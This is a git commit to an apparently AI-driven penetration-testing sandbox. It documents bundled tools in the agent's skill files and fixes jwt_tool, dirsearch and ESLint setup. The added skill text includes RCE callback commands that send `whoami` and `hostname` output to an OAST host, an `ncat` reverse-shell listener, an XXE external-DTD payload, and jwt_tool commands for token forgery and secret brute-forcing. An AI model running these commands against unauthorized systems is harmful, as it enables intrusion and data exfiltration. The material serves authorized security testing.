Surface the previously-undocumented sandbox tools and unbreak two of them

The image ships 15 tools (jwt_tool, interactsh-client, arjun, dirsearch,
gospider, wafw00f, retire, eslint, jshint, js-beautify, JS-Snooper,
jsniper.sh, vulnx, ncat, uv) that the always-loaded skills never name
with usage guidance — agents could discover them via the environment
catalog but had no when/how. Add concise mentions in the natural home
for each: jwt_tool in the JWT skill, interactsh-client in the OAST
sections of SSRF/XXE/RCE, arjun in IDOR recon, dirsearch as the broad
alternate in the ffuf skill, gospider + the JS scrapers in katana,
wafw00f next to httpx, retire/eslint/jshint/js-beautify as a new
JavaScript-Side Coverage block in the SAST playbook, uv in python,
vulnx in the deep scan-mode CVE bullet, ncat in a new RCE Tooling
block.

Audit also turned up three real breakages along the way:

- jwt_tool's shebang resolves to /usr/bin/python3 but its dependencies
  live in /app/.venv, so every invocation died with
  ModuleNotFoundError: ratelimit. Replace the bare symlink with a
  wrapper that execs /app/.venv/bin/python against the real script.
- dirsearch's pipx venv ended up with setuptools 82, which dropped
  pkg_resources — startup failed before parsing args. Pin the inject
  to setuptools<81.
- ESLint's --no-eslintrc flag was removed in v9; the surviving
  --no-config-lookup covers it. Drop the dead flag from the SAST
  command block.

Also corrected the JS-Snooper / jsniper.sh entry in katana.md — both
take a bare domain and run their own JS discovery internally, not the
JS URLs Katana already harvested.
This commit is contained in:
0xallam
2026-05-25 22:02:15 -07:00
parent c88b2bbb99
commit 8ed5311b8e
12 changed files with 91 additions and 5 deletions
+6 -2
View File
@@ -75,7 +75,7 @@ RUN nuclei -update-templates
RUN pipx install arjun && \ RUN pipx install arjun && \
pipx install dirsearch && \ pipx install dirsearch && \
pipx inject dirsearch setuptools && \ pipx inject dirsearch 'setuptools<81' && \
pipx install wafw00f pipx install wafw00f
ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global
@@ -193,7 +193,11 @@ USER pentester
RUN python3 -m venv /app/.venv && \ RUN python3 -m venv /app/.venv && \
/app/.venv/bin/pip install --no-cache-dir caido-sdk-client && \ /app/.venv/bin/pip install --no-cache-dir caido-sdk-client && \
/app/.venv/bin/pip install --no-cache-dir -r /home/pentester/tools/jwt_tool/requirements.txt && \ /app/.venv/bin/pip install --no-cache-dir -r /home/pentester/tools/jwt_tool/requirements.txt && \
ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool printf '%s\n' \
'#!/bin/bash' \
'exec /app/.venv/bin/python /home/pentester/tools/jwt_tool/jwt_tool.py "$@"' \
> /home/pentester/.local/bin/jwt_tool && \
chmod +x /home/pentester/.local/bin/jwt_tool
COPY --chown=pentester:pentester strix/tools/proxy/caido_api.py /opt/strix-python/caido_api.py COPY --chown=pentester:pentester strix/tools/proxy/caido_api.py /opt/strix-python/caido_api.py
ENV PYTHONPATH=/opt/strix-python ENV PYTHONPATH=/opt/strix-python
+17
View File
@@ -121,6 +121,23 @@ trivy fs --scanners vuln,misconfig --timeout 30m --offline-scan \
--format json --output /workspace/.strix-source-aware/trivy-fs.json . || true --format json --output /workspace/.strix-source-aware/trivy-fs.json . || true
``` ```
## JavaScript-Side Coverage
For frontends and Node services, layer these on top of the language-agnostic
passes above:
```bash
retire --path . --outputformat json --outputpath /workspace/.strix-source-aware/retire.json || true
eslint --no-config-lookup --rule '{"no-eval":2,"no-implied-eval":2}' \
-f json -o /workspace/.strix-source-aware/eslint.json . || true
```
When you hit a minified bundle, run `js-beautify <file>` for a readable
view before greppping — and use `jshint --reporter=unix <file>` as a
lighter syntax/anti-pattern check when ESLint is over-eager. The
`JS-Snooper` / `jsniper.sh` tools (in `katana.md`) are the right next
step to mine those bundles for endpoint candidates.
## Converting Static Signals Into Exploits ## Converting Static Signals Into Exploits
1. Rank candidates by impact and exploitability. 1. Rank candidates by impact and exploitability.
+2
View File
@@ -30,6 +30,8 @@ Thorough understanding before exploitation. Test every parameter, every endpoint
- Review file handling: upload, download, processing - Review file handling: upload, download, processing
- Understand the deployment model and infrastructure assumptions - Understand the deployment model and infrastructure assumptions
- Check all dependency versions and repository risks against CVE/misconfiguration data - Check all dependency versions and repository risks against CVE/misconfiguration data
- For quick CVE lookups on a named product/version, use `vulnx search <query>`
(ProjectDiscovery's CVE database) before falling back to web_search
**Blackbox (no source)** **Blackbox (no source)**
- Exhaustive subdomain enumeration with multiple sources and tools - Exhaustive subdomain enumeration with multiple sources and tools
+6
View File
@@ -64,3 +64,9 @@ Failure recovery:
If uncertain, query web_search with: If uncertain, query web_search with:
`site:github.com/ffuf/ffuf <flag> README` `site:github.com/ffuf/ffuf <flag> README`
Alternate tool for path/file enumeration: `dirsearch -u <url> -e php,html,js,json`
ships with curated wordlists, sane defaults, and built-in recursion. Reach
for ffuf when you need surgical fuzzing of any input position (header,
body, vhost) or precise filter control; reach for dirsearch for a quick
broad sweep with no setup.
+5
View File
@@ -75,3 +75,8 @@ Failure recovery:
If uncertain, query web_search with: If uncertain, query web_search with:
`site:docs.projectdiscovery.io httpx <flag> usage` `site:docs.projectdiscovery.io httpx <flag> usage`
Companion: `wafw00f <url>` fingerprints the WAF/CDN in front of a target
(Cloudflare, Akamai, AWS WAF, etc.). Run it once after httpx confirms the
host is live — the WAF identity decides whether to throttle fuzzing,
swap to evasion payload sets, or assume blocking and route differently.
+11
View File
@@ -74,3 +74,14 @@ Failure recovery:
If uncertain, query web_search with: If uncertain, query web_search with:
`site:docs.projectdiscovery.io katana <flag> usage` `site:docs.projectdiscovery.io katana <flag> usage`
Complementary crawlers / JS endpoint extractors in the sandbox:
- `gospider -s https://target.tld -d 3 -c 10 -t 20` — alternate crawler;
picks up things Katana misses on weird sites; use it as a second
pass when Katana output looks thin.
- `~/tools/JS-Snooper/js_snooper.sh <domain>` and
`~/tools/jsniper.sh/jsniper.sh <domain>` — both take a bare domain and
run their own JS-file discovery internally (jsniper drives httpx +
katana + nuclei file templates). Reach for them when you want a quick
"find endpoints/keys/secrets in any JS this domain serves" sweep
without wiring it up yourself.
+10
View File
@@ -88,3 +88,13 @@ For iterative exploit work, put code in a file:
2. Run it with `exec_command`: `python3 /workspace/scratch/exploit.py`. 2. Run it with `exec_command`: `python3 /workspace/scratch/exploit.py`.
3. Edit and rerun until the proof-of-concept is reliable. 3. Edit and rerun until the proof-of-concept is reliable.
``` ```
## Installing extra packages
The sandbox's Python lives in `/app/.venv`. To add a one-off dependency
for an exploit script, use `uv` (already in the image and much faster
than pip):
```bash
uv pip install --python /app/.venv/bin/python <package>
```
@@ -151,6 +151,16 @@ JWT/OIDC failures often enable token forgery, token confusion, cross-service acc
9. Favor minimal PoCs that clearly show cross-context acceptance and durable access 9. Favor minimal PoCs that clearly show cross-context acceptance and durable access
10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each 10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each
## Tooling
- `jwt_tool -t <url> -rh "Authorization: Bearer <token>" -M at` runs the
full attack matrix (alg=none, RS→HS confusion, kid injection, claim
edits) and reports which mutations the server still accepts.
- `jwt_tool <token> -C -d <wordlist>` brute-forces HMAC secrets when an
HS-family signature is in use.
- Use `jwt_tool` to mint a token under a key you control once you find an
acceptance path (kid/jku/x5u/jwk), then replay via `repeat_request`.
## Summary ## Summary
Verification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion. Verification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion.
+3
View File
@@ -47,6 +47,9 @@ Object-level authorization failures (BOLA/IDOR) lead to cross-account data expos
**Parameter Analysis** **Parameter Analysis**
- Pagination/cursors: `page[offset]`, `page[limit]`, `cursor`, `nextPageToken` (often reveal or accept cross-tenant/state) - Pagination/cursors: `page[offset]`, `page[limit]`, `cursor`, `nextPageToken` (often reveal or accept cross-tenant/state)
- Directory/list endpoints as seeders: search/list/suggest/export often leak object IDs for secondary exploitation - Directory/list endpoints as seeders: search/list/suggest/export often leak object IDs for secondary exploitation
- Find undocumented params with `arjun -u <url>` (GET) or `arjun -u <url> -m POST`
surfaces hidden filters like `?include_deleted=1`, `?as_user=…`, `?owner_id=…`
that frequently widen the IDOR surface.
**Enumeration Techniques** **Enumeration Techniques**
- Alternate types: `{"id":123}` vs `{"id":"123"}`, arrays vs scalars, objects vs scalars - Alternate types: `{"id":123}` vs `{"id":"123"}`, arrays vs scalars, objects vs scalars
+13 -2
View File
@@ -41,14 +41,18 @@ Remote code execution leads to full server control when input reaches code execu
### OAST ### OAST
Use `interactsh-client -v` in the sandbox to mint a unique callback
domain (`*.oast.fun`); substitute it for `attacker.tld` below. Each
invocation prints inbound DNS/HTTP hits to stdout in real time.
**DNS** **DNS**
```bash ```bash
nslookup $(whoami).x.attacker.tld nslookup $(whoami).xyz.oast.fun
``` ```
**HTTP** **HTTP**
```bash ```bash
curl https://attacker.tld/$(hostname) curl https://xyz.oast.fun/$(hostname)
``` ```
### Output-Based ### Output-Based
@@ -233,6 +237,13 @@ pop graphic-context
6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies 6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies
7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops 7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops
## Tooling
- Reverse-shell listener: `ncat -lvnp 4444` (in the sandbox; `ncat` is the
netcat variant that ships in the image). Pair with a one-shot shell
payload only when OAST + selective reads are insufficient — never
drop a persistent shell when a single targeted command will prove it.
## Summary ## Summary
RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path. RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.
+5 -1
View File
@@ -123,7 +123,11 @@ Server-Side Request Forgery enables the server to reach networks and services th
## Blind SSRF ## Blind SSRF
- Use OAST (DNS/HTTP) to confirm egress - Use OAST (DNS/HTTP) to confirm egress. `interactsh-client -v` (running
in the sandbox) gives you a unique `*.oast.fun` domain; embed it in
the URL parameter and watch the interactsh stdout for the inbound
DNS/HTTP hit. Each invocation yields a fresh domain — restart between
payloads if you need to correlate hits to a specific request.
- Derive internal reachability from timing, response size, TLS errors, and ETag differences - Derive internal reachability from timing, response size, TLS errors, and ETag differences
- Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs) - Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs)
+3
View File
@@ -49,6 +49,9 @@ XML External Entity injection is a parser-level failure that enables local file
- Blind XXE via parameter entities and external DTDs; confirm with DNS/HTTP callbacks - Blind XXE via parameter entities and external DTDs; confirm with DNS/HTTP callbacks
- Encode data into request paths/parameters to exfiltrate small secrets (hostnames, tokens) - Encode data into request paths/parameters to exfiltrate small secrets (hostnames, tokens)
- Use `interactsh-client -v` for the callback domain. Reference it as the
external DTD host (e.g. `<!ENTITY % ex SYSTEM "http://xyz.oast.fun/x.dtd">`)
and read the DNS/HTTP hit on the interactsh stdout.
### Timing ### Timing